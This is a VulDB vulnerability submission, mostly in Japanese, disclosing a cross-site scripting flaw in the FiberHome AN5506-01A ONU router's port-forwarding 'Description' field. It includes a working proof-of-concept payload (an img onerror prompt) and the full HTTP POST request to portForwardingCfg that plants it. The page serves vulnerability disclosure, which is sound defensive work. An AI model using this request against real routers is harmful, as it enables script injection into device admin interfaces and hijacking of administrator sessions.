提出 #501365: FiberHome AN5506-01A ONU GPON RP2511 Cross Site Scripting情報

タイトルFiberHome AN5506-01A ONU GPON RP2511 Cross Site Scripting
説明A Cross-site Scripting (XSS) vulnerability was found in the ONU model AN5506-01A application and management. To carry out the attack, it is necessary to access the "Application" menu and select the "Port forwarding" submenu. In the "Add" function, there is an input field for entering description to be added to the port forwarding. The affected field is "Description". In this field, it is possible to inject a Cross-Site Scripting script. Script: <img src="" onerror="prompt(8)"> Request: POST /goform/portForwardingCfg HTTP/1.1 Host: xx.xx.xx.xx Content-Length: 227 Cache-Control: max-age=0 Accept-Language: en-US,en;q=0.9 Origin: http://xx.xx.xx.xx Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://xx.xx.xx.xx/application/port_forwarding.asp Accept-Encoding: gzip, deflate, br Cookie: loginName=admin Connection: keep-alive pf_WAN=0&pf_Description=%3Cimg+src%3D%22%22+onerror%3D%22prompt%288%29%22%3E&pf_PubPortStart=80&pf_PubPortEnd=8080&pf_IP=192.168.1.1&pf_PriPortStart=8090&pf_PriPortEnd=8091&pf_protocol=3&pf_enable=0&pf_apply=Apply&fw_curIndex=0
ソース⚠️ http://x.x.x.x/login.html
ユーザー
 Havook (UID 71104)
送信2025年02月14日 18:24 (1 年 ago)
モデレーション2025年02月23日 08:14 (9 days later)
ステータス承諾済み
VulDBエントリ296604 [FiberHome AN5506-01A ONU GPON RP2511 Port Forwarding Submenu portForwardingCfg pf_Description クロスサイトスクリプティング]
ポイント17

Might our Artificial Intelligence support you?

Check our Alexa App!